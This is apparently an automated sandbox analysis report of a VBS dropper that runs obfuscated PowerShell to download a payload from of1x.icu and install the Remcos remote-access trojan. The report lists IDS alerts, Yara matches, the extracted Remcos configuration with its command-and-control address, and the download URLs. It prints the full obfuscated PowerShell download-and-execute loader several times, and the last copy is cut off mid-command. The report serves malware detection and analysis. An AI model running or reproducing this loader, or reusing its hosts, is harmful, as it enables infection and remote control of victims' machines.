              2024-12-12T07:55:17.429700+010020365941Malware Command and Control Activity Detected192.168.2.749786154.216.18.2162404TCP
              2024-12-12T07:55:40.476958+010020365941Malware Command and Control Activity Detected192.168.2.749841154.216.18.2162404TCP
              2024-12-12T07:56:03.524506+010020365941Malware Command and Control Activity Detected192.168.2.749894154.216.18.2162404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:54:52.755878+010028032702Potentially Bad Traffic192.168.2.749776172.67.216.143443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
              Source: unknownHTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49776 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1599797657.0000000007B6C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1246016018.00000232AF2D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244087582.00000232AF0D1000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49786 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49894 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49841 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49946 -> 154.216.18.216:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 154.216.18.216
              Source: global trafficTCP traffic: 192.168.2.7:49786 -> 154.216.18.216:2404
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49776 -> 172.67.216.143:443
              Source: global trafficHTTP traffic detected: GET /rxHEjEYE/Nickelization.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /rxHEjEYE/Nickelization.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: of1x.icu
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsk
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.H
              Source: powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1365512163.0000029101C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://of1x.icu
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1365512163.000002910133D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1365512163.0000029101BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2547290255.0000000006B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin#;
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin(;
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.binI
              Source: powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rxHEjEYE/Nickelization.csvP
              Source: powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rxHEjEYE/Nickelization.csvXR
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownHTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.216.143:443 -> 192.168.2.7:49776 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7452.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Stjkortlgningen.ShellExecute( "p" + Halvabernes,Psocidae & Woolly & Psocidae,"","",0)
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC48B8D22_2_00007FFAAC48B8D2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC48AB262_2_00007FFAAC48AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC55A4DA2_2_00007FFAAC55A4DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC559CCA2_2_00007FFAAC559CCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC5587A52_2_00007FFAAC5587A5
              Source: Strait STS.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6259
              Source: unknownProcess created: Commandline size = 6259
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6259Jump to behavior
              Source: amsi32_7452.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@8/7@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\huguenotism.BedJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lymuuapl.w43.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2356
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7452
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav 